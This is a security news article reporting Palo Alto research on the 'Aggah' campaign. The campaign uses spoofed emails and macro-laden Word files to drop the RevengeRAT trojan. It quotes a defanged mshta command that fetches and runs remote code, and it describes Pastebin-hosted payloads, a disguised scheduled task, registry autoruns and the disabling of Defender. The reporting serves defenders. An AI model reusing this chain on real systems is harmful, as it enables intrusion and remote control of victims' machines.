Hackers Drop RevengeRAT Malware On Windows System Via Weaponized Word Document

by chebbi abir

New Malware attack campaign dubbed “Aggah” targeting various countries via weaponized Word documents and infect the victims by dropping the available RevengeRAT from Pastebin.

Researchers from Palo Alto recently observed the largest malware campaign via telemetry and they named as Aggah based on the actor’s alias “hagga”.

Threat actors behind this campaign also make use of RevengeRAT, a publicly available Remote access trojan that has many leaked builders freely available in open source.

Attackers targeting various organization in Middle Eastern country,
United States, Europe, and Asia based countries to targeting business such as Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, Technology, and other Professional business.

Aggah Malware campaign Infection Process

Aggah malware campaign mainly delivering the malicious word document attachment via Spoofed email that posed as a legitimate email from a large financial institution in the Middle East.

Once the users click the attached Word document with the filename “Activity.doc”, it attempted to load a remote OLE document via Template Injection.

Also the document trick users in enabling content to run the macro and also force users to the open document only in the desktop versions of Microsoft Word.

Later a remote OLE document loads an another heavily obfuscated Excel document with a heavily obfuscated macro which is to decode and execute the following URL via the “Shell” command:

mshta hxxp://www.bitly[.]com/SmexEaldos3

Once the command gets executed, victims redirected to a blog hosted on blogspot[.]com that actually includes a JavaScript embedded that performs several activities including its attempts to kill the Microsoft Defender process by removing its signature set.

According to Palo Alto Research, The script hosted on Blogspot then carries out three main activities that include:

  1. Downloading a payload from a Pastebin URL
  2. Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
  3. Creating an autorun registry key to obtain and run a script from a Pastebin URL

A malicious script hosted at Blogspot using Pastebin URL to obtain a portable executable payload and execute it.

Further Analysis reveals that the payload written in a .NET language and named “Nuclear Explosion,” which is a variant of RevengeRAT.

The script hosted at the Blogspot blog builds another command to create a scheduled task called “eScan Backup” that runs every 100 minutes.

“RevengeRAT is a commodity Trojan that has many leaked builders freely available in open source, which makes attributing the tool’s use to a specific actor or attack campaign difficult.”

“To create the RevengeRAT payload used in this campaign, the actor would use the RevengeRAT server to compile an executable configured with the appropriate fields.”

RevengeRAT Builder Socket Key Setting

End of the process, RevengeRAT server will create a client executable with a default name of “Client.exe” which is used to infect the victim’s windows system.[…]

To read the original article:



Interdit de copier  ce contenu